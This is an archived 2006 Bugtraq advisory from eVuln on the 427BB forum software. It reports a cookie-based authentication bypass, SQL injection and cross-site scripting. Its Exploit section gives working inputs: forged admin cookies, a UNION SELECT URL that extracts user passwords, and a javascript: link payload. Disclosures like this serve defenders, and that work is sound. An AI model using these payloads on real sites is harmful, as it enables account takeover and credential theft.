lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060107112033.29418.qmail@securityfocus.com>
Date: 7 Jan 2006 11:20:33 -0000
From: alex@...ln.com
To: bugtraq@...urityfocus.com
Subject: [eVuln] 427BB Multiple Vulnerabilities (Cookie-based
 Authentication Bypass, SQL Injections, XSS)


New eVuln Advisory:
427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)

--------------------Summary----------------

Software: 427BB
Sowtware's Web Site: http://sourceforge.net/projects/fourtwosevenbb
Versions: checked: 2.2 and 2.2.1
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Published: 2006.01.07
eVuln ID: EV0018

-----------------Description--------------
427BB has multiple vulnerabilities.


1. Authentication bypass using modified cookie values.

Vulnerabe scripts: login.php getvars.php
To authorize any logged-in user forum scripts checks only three cookie values:
username
authenticated
usertype
Forum dont make password comparison.


2. 427BB has Multiple SQL Injection Vulnerabilities.

For example:
Vulnerabe script: showthread.php
Variable $ForumID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code


3. Arbitrary script code insertion is possible when posting a message containing URL.
Vulnerable Script: posts.php
Condition: visitor needs to click this link

--------------Exploit---------------------
1. Authentication bypass using modified cookie values.

Cookie: username=admin;
Cookie: authenticated=1;
Cookie: usertype=admin;

2. SQL Injection Example.

Need to be logged in as registered user.
http://host/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal

3. Arbitrary script code insertion.

Posting new message.
Message text:
[url=javascript:alert(123)]clickme[/url]

--------------Solution---------------------
No Patch available.

--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/18/summary.html

Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ